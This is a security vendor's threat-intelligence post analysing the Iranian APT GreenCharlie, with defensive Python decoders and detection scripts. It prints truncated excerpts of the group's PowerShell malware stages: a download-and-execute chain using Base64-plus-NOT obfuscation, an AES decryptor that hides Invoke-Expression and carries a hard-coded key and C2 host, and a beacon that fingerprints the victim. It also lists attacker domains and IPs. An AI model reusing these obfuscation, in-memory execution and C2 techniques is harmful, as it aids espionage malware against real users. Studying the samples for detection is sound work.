Picus Labs | 7 MIN READ

CREATED ON November 11, 2025

GreenCharlie APT: Iran’s PowerShell-Based Cyber Espionage Campaigns

GreenCharlie is an Iran-based advanced persistent threat (APT) group known for its active cyber-espionage and phishing operations. The group has been active since at least 2020 [1] and continues to operate as of late 2024. GreenCharlie demonstrates a sophisticated understanding of network infrastructure management, leveraging commercial domain registrars and dynamic DNS (DDNS) services to enable rapid infrastructure turnover and maintain operational stealth.

Beginning in May 2024, the group significantly expanded its infrastructure footprint, registering a large number of DDNS domains likely intended for targeted phishing campaigns. These domains were often themed around legitimate services such as cloud platforms, document editors, and authentication portals—examples include activeeditor[.]info, webviewerpage[.]info, and documentcloudeditor.ddnsgeek[.]com. Throughout July and August 2024, Iranian IP addresses were observed communicating with GreenCharlie-controlled servers over distinctive ports, suggesting active operations. 

GreenCharlie’s toolset centers on a multi-stage PowerShell-based malware framework, including variants known as GORBLE, TAMECAT, and POWERSTAR. These tools employ advanced obfuscation, layered decryption, and in-memory execution to evade detection. Their staged architecture includes a downloader/decoder, an AES-based decryptor/executor (using functions like KeyMaster or Borjol), and a command-and-control (C2) beacon that exfiltrates host information. The group’s use of obfuscation techniques such as Base64 encoding combined with bitwise operations and the substitution of standard execution methods (e.g., replacing Invoke-Expression with ScriptBlock.Create) demonstrates an evolving sophistication in evading static and behavioral detection systems.

In this post, we will examine GreenCharlie’s known history, review their infrastructure-centric operations, and detail their PowerShell-based, multi-stage malware campaigns (GORBLE, TAMECAT, POWERSTAR). We’ll break down the group’s TTPs and finish by showing how Picus can help detect, test, and harden defenses against this group.


History & Major Activities of GreenCharlie Group

  • May 2024 - The group began registering a large number of dynamic DNS (DDNS) domains, likely used for targeted phishing operations [1].

  • July - August 2024 - Iran-based IP addresses were observed communicating with GreenCharlie's infrastructure over distinct ports, indicating active use of the network for operations [1].

  • August 2024 - Details of GreenCharlie's infrastructure were publicly disclosed. The group remains highly active, and while no direct evidence indicates targeting of the U.S. government or political parties, the likelihood of attacks using the identified infrastructure is considered elevated [1].

ATT&CK Mapping (TTPs) of GreenCharlie Group

Tactic: Resource Development

T1583.001 Acquire Infrastructure: Domains

Adversaries acquire domains that can be used during targeting for various purposes, such as phishing or command and control. The group utilizes the commercial registrar Namecheap to register domains that are thematically aligned with their social engineering lures, employing keywords related to cloud platforms, file sharing services, document visualization services, video conferencing, and authentication-themed domains. These keywords include "cloud", "uptimezone", "doceditor", "joincloud", and "pageviewer". They also used .info, .xyz, .icu, .network, .online, and .site as TLDs. Example domains used by GreenCharlie are given below [1]:

activeeditor[.]info
webviewerpage[.]info
Onlinecloudzone[.]info
chatsynctransfer[.]info

Tactic: Initial Access

T1566.002 Phishing: Spearphishing Link

The domain documentcloudeditor.ddnsgeek[.]com, which resolved to 38.180.146[.]174, was observed hosting a PhishTest portal. The portal’s exact purpose remains unclear, but plausible uses include facilitating attack operations, supporting threat actor training, or serving as a platform for Iran-based security awareness exercises [1].

Tactic: Execution

T1059.001 Command and Scripting Interpreter: PowerShell

The entire GORBLE, TAMECAT, and POWERSTAR malware family is constructed as a multi-stage PowerShell execution chain.

The malware's execution chain is deliberately complex and obfuscated across three primary stages [1]:

Stage 1 - Downloader and Decoder: 

The initial script is responsible for fetching the second stage. It decodes a hardcoded URL and downloads the next payload. To evade static analysis, the script that is downloaded is not the final payload but rather another PowerShell function. This function, named either KeyMaster or Borjol, is revealed through a two-step decoding process: a standard Base64 decoding followed by a bitwise NOT operation on every byte of the result. This layered obfuscation is designed to break simple decoding tools and signatures that only look for Base64-encoded content.   

Stage 2 - Decryptor and Executor:

The KeyMaster or Borjol function from Stage 1 contains the logic to decrypt the final payload. It uses the Advanced Encryption Standard (AES) algorithm with a hard-coded key and initialization vector (IV) to decrypt an embedded data blob from the first stage. The method used to execute the decrypted payload varies slightly between the malware variants, revealing an evolution in the actor's tradecraft. The TAMECAT and POWERSTAR variants use the Invoke-Expression cmdlet (commonly aliased as iex), a powerful but widely monitored method for executing code from a string. In contrast, the GORBLE variant uses ScriptBlock.Create, a more subtle alternative that achieves the same outcome but may evade detection rules specifically targeting Invoke-Expression.   

Stage 3 - C2 Beacon: 

Once the final payload is decrypted and executed in memory, it performs its initial communication with the C2 server. It gathers basic system information—specifically, the victim's operating system and computer name. This data is formatted into a JSON structure, encrypted using AES, Base64-encoded, and finally transmitted to the C2 server via an HTTP POST request.

Below are excerpts from the three stages of the GORBLE malware, as published in [1] (truncated strings are marked <…>):

First Stage:

function Gorba {
  param($Ste12)                      # AES-encrypted blob for the final stage, passed on to Keymaster below
  $wc = New-Object System.Net.WebClient;
  $wc.Headers['User-Agent'] = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Ch<…>"
  while (1) {                        # retry the download until it succeeds, sleeping 8 s between attempts
      try {
          # bbsert (not included in the excerpt) decodes the hardcoded second-stage URL
          $OutRes = $wc.downloadString((bbsert 'iltaHR0cHM6Ly9taXhlZGludGVnZXJsaW5lYXIuYmFyYmFyYS1kZC1wYWRyb24ud<…>'
          break
      }
      catch {
          Start-Sleep -s 8;
          Continue
      }
  };
  # Layer 1: plain Base64 decode of the downloaded text
  $bytesOfRes = [Convert]::FromBase64String($OutRes);
  # Layer 2: bitwise NOT of every byte. -bnot yields a signed 32-bit value, so it is rendered
  # as a 32-character binary string and only the low 8 bits are kept
  for ($i = 0; $i -lt $bytesOfRes.Length; $i++) {
      $bytesOfRes[$i] = [Convert]::ToByte([Convert]::ToString((-bnot $bytesOfRes[$i]), 2).SubString(24, 8), 2)
  };
  $LastEx = [System.Text.Encoding]::UTF8.GetString($bytesOfRes);
  # Wildcard Get-Command (gcm) lookup that resolves to Invoke-Expression without the cmdlet
  # name appearing literally; this defines the Keymaster function from the decoded text
  &(gcm *v?k?-?x?re*).name $LastEx;
  Keymaster "$Ste12"
}
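As an added analyst helper (not part of the original post or of [1]), the following Python reimplements the two-layer decoding that Stage 1 above performs, with a constructed sample standing in for the downloaded text. It mirrors the ToString(…, 2).SubString(24, 8) idiom literally to show that it is nothing more than an 8-bit bitwise NOT, and contrasts the printable-character ratio after a Base64-only decode with the ratio after the extra NOT layer, which is why a tool that stops at Base64 sees only high-bit garbage. The sample script, the function names and the printable-ratio heuristic are assumptions of this example.

```python
import base64

# Constructed stand-in for the decoded second stage; not the real Keymaster function.
SAMPLE_STAGE2 = b"function Keymaster {\n  param($text)\n  $iv = 'constructed'\n}\n"


def not_byte_powershell_style(b: int) -> int:
    """Mirror the PowerShell idiom literally: -bnot on a byte yields a signed 32-bit
    integer, rendered as a 32-character binary string; SubString(24, 8) keeps the low
    8 bits, i.e. the bitwise NOT of the original byte."""
    bits = format((~b) & 0xFFFFFFFF, "032b")
    return int(bits[24:32], 2)


def encode_stage1(payload: bytes) -> str:
    """Forward direction (NOT each byte, then Base64); used only to build the sample."""
    return base64.b64encode(bytes((~x) & 0xFF for x in payload)).decode("ascii")


def decode_stage1(blob: str) -> bytes:
    """Reverse the Stage 1 layering: Base64 decode, then bitwise NOT of every byte."""
    raw = base64.b64decode(blob)
    return bytes(not_byte_powershell_style(x) for x in raw)


def printable_ratio(data: bytes) -> float:
    """Share of bytes that are printable ASCII, tab, CR or LF: a crude plausibility
    check for 'is this PowerShell text yet?' (heuristic assumed for this example)."""
    if not data:
        return 0.0
    ok = sum(1 for x in data if 32 <= x < 127 or x in (9, 10, 13))
    return ok / len(data)


def triage(blob: str) -> dict:
    """Compare a Base64-only decode with the Base64+NOT decode of the same blob."""
    plain = base64.b64decode(blob)
    layered = decode_stage1(blob)
    header = layered.decode("utf-8", errors="replace").split("{", 1)[0].strip()
    return {
        "plain_b64_printable": printable_ratio(plain),
        "b64_then_not_printable": printable_ratio(layered),
        "recovered_header": header,
    }


# Constructed blob in the same shape as the text Stage 1 downloads.
SAMPLE_BLOB = encode_stage1(SAMPLE_STAGE2)

if __name__ == "__main__":
    for key, value in triage(SAMPLE_BLOB).items():
        print(f"{key}: {value}")
```

Because every printable ASCII byte maps to a value of 128 or above under NOT, the Base64-only decode of a script encoded this way has a printable ratio of zero, while the full decode recovers the text; the same ratio check is a cheap way to decide which layer a captured blob is still wearing.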

Second Stage:

function Keymaster {
  param($text)                                                          # Base64 text of the AES-encrypted third stage

  $global:destination = "https://translatorupdater.dns-dynamic.net"    # C2 host, substituted into the payload below
  $global:address = ""
  $global:nelson = "eBpcnCbqfARChSwhvihBbiGCUYrhXBTU"                   # hard-coded 32-byte AES-256 key

  $iv = "fourfourfour"          # IV as reproduced in [1] (12 bytes; AES-CBC requires a 16-byte IV)
  $key = $global:nelson

  $encryptedBytes = [System.Convert]::FromBase64String($text)
  $ivBytes = [text.encoding]::UTF8.GetBytes($iv)
  $keyBytes = [text.encoding]::UTF8.GetBytes($key)

  $AES = New-Object System.Security.Cryptography.AesCryptoServiceProvider
  $AES.Mode = [System.Security.Cryptography.CipherMode]::CBC

  $AES.KeySize = 256
  $AES.BlockSize = 128
  $AES.Key = $keyBytes
  $AES.IV = $ivBytes

  # Decrypt the embedded blob in memory; nothing is written to disk
  $decryptor = $AES.CreateDecryptor()
  $decryptedBytes = $decryptor.TransformFinalBlock($encryptedBytes, 0, $encryptedBytes.Length)
  $decryptedString = [System.Text.Encoding]::UTF8.GetString($decryptedBytes)
  # Placeholders in the decrypted script are filled with the C2 settings defined above
  $decryptedString = $decryptedString.Replace("____dest____", "$global:destination")
  $decryptedString = $decryptedString.Replace("____add____", "$global:address")
  $decryptedString = $decryptedString.Replace("____nel____", "$global:nelson")
  # Executed through ScriptBlock.Create rather than Invoke-Expression
  & ([Scriptblock]::Create($decryptedString))
}

Third Stage:

# Host fingerprint assembled into JSON before AES encryption, Base64 encoding and the HTTP POST
# to the C2; $ngyapessafpeq and $ahlqorujlgkgf are defined elsewhere in the payload (not in the excerpt)
$rtbvvtbgwsokffo = (Get-WmiObject -class Win32_OperatingSystem).Caption + " Enc"
$axumgzbrhjkul = '{"rwsdjfxsdf":[{"num":"' + $ngyapessafpeq + '"},
{"OS":"' + $rtbvvtbgwsokffo + '"},
{"ComputerName":"' + $env:COMPUTERNAME + '"},
{"Token":"' + $ahlqorujlgkgf + '"}]}';
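Detection logic, added here as an example and not part of the original post, that scans PowerShell script-block text (the content Windows records in Script Block Logging, Event ID 4104) for the idioms shown across the three stages: Base64 decoding combined with -bnot, a wildcard Get-Command/gcm lookup that resolves to Invoke-Expression, in-memory AES decryption, and execution through [Scriptblock]::Create. The cmdlet list, the rule names and the two sample script blocks are constructed for this example; the wildcard resolver goes a step beyond the page by resolving any gcm pattern, not only the one in the listing.

```python
import re
from fnmatch import fnmatchcase
from typing import Dict, List

# Constructed subset of cmdlet names; an analyst would load the full set from Get-Command.
KNOWN_CMDLETS = [
    "Invoke-Expression", "Invoke-WebRequest", "Invoke-RestMethod", "Invoke-Command",
    "Invoke-Item", "Get-Variable", "Set-Variable", "New-Object", "Get-Command",
    "Start-Sleep", "Get-WmiObject", "ConvertFrom-Json", "Write-Output",
]

# Argument passed to gcm / Get-Command, e.g. the *v?k?-?x?re* pattern in the listing above
GET_COMMAND_RE = re.compile(r"\b(?:gcm|Get-Command)\s+([\w*?\-\[\]]+)", re.IGNORECASE)


def resolve_wildcard_cmdlets(script: str) -> Dict[str, List[str]]:
    """Map each wildcard pattern given to gcm/Get-Command onto the cmdlet names it
    selects. PowerShell wildcards are case-insensitive, so both sides are lowercased."""
    resolved: Dict[str, List[str]] = {}
    for pattern in GET_COMMAND_RE.findall(script):
        if "*" not in pattern and "?" not in pattern:
            continue  # literal cmdlet name, nothing is being hidden
        resolved[pattern] = [c for c in KNOWN_CMDLETS if fnmatchcase(c.lower(), pattern.lower())]
    return resolved


def _has(pattern: str, script: str) -> bool:
    return re.search(pattern, script, re.IGNORECASE) is not None


def scan_script_block(script: str) -> List[str]:
    """Return the names of the GreenCharlie-style idioms present in one script block."""
    hits: List[str] = []
    # Stage 1: Base64 decode followed by a per-byte bitwise NOT
    if _has(r"FromBase64String", script) and _has(r"-bnot\b", script):
        hits.append("base64_then_bitwise_not")
    # Stage 1: Invoke-Expression reached through a wildcard Get-Command lookup
    if any("Invoke-Expression" in names for names in resolve_wildcard_cmdlets(script).values()):
        hits.append("wildcard_lookup_resolves_to_invoke_expression")
    # Stage 2: AES decryption of an embedded blob straight into a string
    if _has(r"AesCryptoServiceProvider", script) and _has(r"TransformFinalBlock", script):
        hits.append("aes_decrypt_in_memory")
    # Stage 2 (GORBLE): execution via ScriptBlock.Create instead of Invoke-Expression
    if _has(r"\[\s*scriptblock\s*\]\s*::\s*Create\s*\(", script):
        hits.append("scriptblock_create_execution")
    return hits


def scan_events(events: Dict[str, str]) -> Dict[str, List[str]]:
    """Run the scan over a mapping of event id -> script block text."""
    return {event_id: scan_script_block(text) for event_id, text in events.items()}


# Constructed script-block texts (not real captures). evt-1 imitates the Stage 1/2
# idioms from the GORBLE listing; evt-2 is a benign script that also decodes Base64.
SAMPLE_EVENTS = {
    "evt-1": (
        "$b = [Convert]::FromBase64String($r);\n"
        "for ($i = 0; $i -lt $b.Length; $i++) {\n"
        "  $b[$i] = [Convert]::ToByte([Convert]::ToString((-bnot $b[$i]), 2).SubString(24, 8), 2)\n"
        "};\n"
        "$s = [System.Text.Encoding]::UTF8.GetString($b);\n"
        "&(gcm *v?k?-?x?re*).name $s;\n"
        "& ([Scriptblock]::Create($decrypted))"
    ),
    "evt-2": (
        "$cfg = [Convert]::FromBase64String($env:APP_CONFIG_B64);\n"
        "$settings = [System.Text.Encoding]::UTF8.GetString($cfg) | ConvertFrom-Json;\n"
        "Get-Command Invoke-WebRequest | Out-Null"
    ),
}

if __name__ == "__main__":
    for event_id, hits in scan_events(SAMPLE_EVENTS).items():
        print(event_id, hits or "clean")
```

Resolving the wildcard rather than matching the literal string is the point: a rule that only looks for "Invoke-Expression" or "iex" never fires on the Stage 1 listing, while resolving *v?k?-?x?re* against the cmdlet table shows that exactly one cmdlet satisfies it. Requiring Base64 together with -bnot, rather than Base64 alone, keeps ordinary configuration decoding (evt-2) out of the alert queue.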

Tactic: Command and Control

T1568 Dynamic Resolution

GreenCharlie leveraged dynamic DNS (DDNS) to establish and manage its infrastructure, registering domains across multiple DDNS providers. It employed services such as Dynu, DNSEXIT, Vitalwerks, Cloud DNS, FreeDNS, and Dia Systems for this purpose. This approach enabled quick rotation or reconfiguration of infrastructure components while maintaining operational continuity. Example DDNS domains used by GreenCharlie are given below [1]:

Documentcloudeditor.ddnsgeek[.]com
Coldwarehexahash.dns-dynamic[.]net
Uptime-timezone.dns-dynamic[.]net
translatorupdater.dns-dynamic[.]net
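An added example (not from the original post) of how a defender might act on the DDNS observation above: it refangs indicators, flags DNS query log lines whose query name sits under one of the DDNS apex domains seen in the examples (ddnsgeek.com, dns-dynamic.net), and separates exact hits on the listed GreenCharlie hostnames from any other host under those apexes. The log format, the client IPs, the mail.example.org and www.example.com names and the extra host notes-sync.ddnsgeek.com are constructed; the apex list is an assumption derived from the page's examples and would be extended from each provider's published apex domains.

```python
from typing import List, Optional, Tuple

# DDNS apex domains taken from the example hostnames above (assumption: an analyst
# extends this with the apexes published by the providers named in the text).
DDNS_APEXES = ("ddnsgeek.com", "dns-dynamic.net")

# The GreenCharlie DDNS hostnames listed above, kept defanged as published in [1].
GREENCHARLIE_WATCHLIST = [
    "Documentcloudeditor.ddnsgeek[.]com",
    "Coldwarehexahash.dns-dynamic[.]net",
    "Uptime-timezone.dns-dynamic[.]net",
    "translatorupdater.dns-dynamic[.]net",
]


def refang(indicator: str) -> str:
    """Normalize a possibly defanged hostname: undo [.], lowercase, drop a trailing dot."""
    return indicator.strip().replace("[.]", ".").lower().rstrip(".")


def ddns_apex(hostname: str) -> Optional[str]:
    """Return the DDNS apex a hostname sits under, or None if it is not a DDNS name."""
    host = refang(hostname)
    for apex in DDNS_APEXES:
        # Require a label boundary so evil.ddnsgeek.com.example.test does not match
        if host == apex or host.endswith("." + apex):
            return apex
    return None


WATCHLIST = {refang(h) for h in GREENCHARLIE_WATCHLIST}


def classify(hostname: str) -> Optional[str]:
    """'watchlist' for a listed GreenCharlie hostname, 'ddns' for any other host under
    a DDNS apex, None for everything else."""
    host = refang(hostname)
    if host in WATCHLIST:
        return "watchlist"
    if ddns_apex(host):
        return "ddns"
    return None


# Constructed DNS query log (timestamp, client, query name); not real telemetry.
SAMPLE_DNS_LOG = """\
2024-08-01T10:00:01Z 10.0.0.15 documentcloudeditor.ddnsgeek.com
2024-08-01T10:00:02Z 10.0.0.15 mail.example.org
2024-08-01T10:00:03Z 10.0.0.22 translatorupdater.dns-dynamic.net
2024-08-01T10:00:04Z 10.0.0.22 www.example.com
2024-08-01T10:00:05Z 10.0.0.31 notes-sync.ddnsgeek.com.
"""


def flag_ddns_queries(log_text: str) -> List[Tuple[str, str, str]]:
    """Return (client, hostname, verdict) for every query worth an analyst's attention."""
    flagged: List[Tuple[str, str, str]] = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue  # malformed line; skip rather than guess at the fields
        _timestamp, client, qname = parts
        verdict = classify(qname)
        if verdict:
            flagged.append((client, refang(qname), verdict))
    return flagged


if __name__ == "__main__":
    for client, host, verdict in flag_ddns_queries(SAMPLE_DNS_LOG):
        print(f"{client} -> {host} [{verdict}]")
```

Keeping the two verdicts apart matters operationally: a watchlist hit is a direct indicator match and warrants a host triage, whereas a generic DDNS hit is only a lead, since the same apexes are shared with legitimate users of those providers and the group rotates hostnames quickly.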

T1665 Hide Infrastructure

Network telemetry showed consistent communication between GreenCharlie infrastructure and IP addresses linked to ProtonVPN and Proton Mail, including 185.159.159[.]140, 185.70.42[.]45, 185.159.159[.]148, 185.70.42[.]37, 149.22.84[.]139, 146.70.174[.]66, 146.70.194[.]50, and 169.150.226[.]161. The group has also been seen leveraging other VPN services, such as ExpressVPN and PIA, reflecting a broader pattern among Iranian advanced persistent threats to mask operational traffic [1]. These behaviors indicate a deliberate effort to conceal operational activities behind privacy services.

How Does Picus Simulate GreenCharlie Attacks?

We strongly suggest simulating GreenCharlie attacks with the Picus Security Validation Platform to test the effectiveness of your security controls against real-life cyber attacks. You can also test your defenses against hundreds of other threat groups within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for GreenCharlie:

Threat ID | Threat Name | Attack Module
37212 | GreenCharlie Threat Group Campaign Malware Email Threat | Network Infiltration
47388 | GreenCharlie Threat Group Campaign Malware Download Threat | Network Infiltration

Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.

References

[1] "GreenCharlie infrastructure linked to US political campaign targeting." Accessed: Oct. 24, 2025. [Online]. Available: https://assets.recordedfuture.com/insikt-report-pdfs/2024/cta-ir-2024-0820.pdf
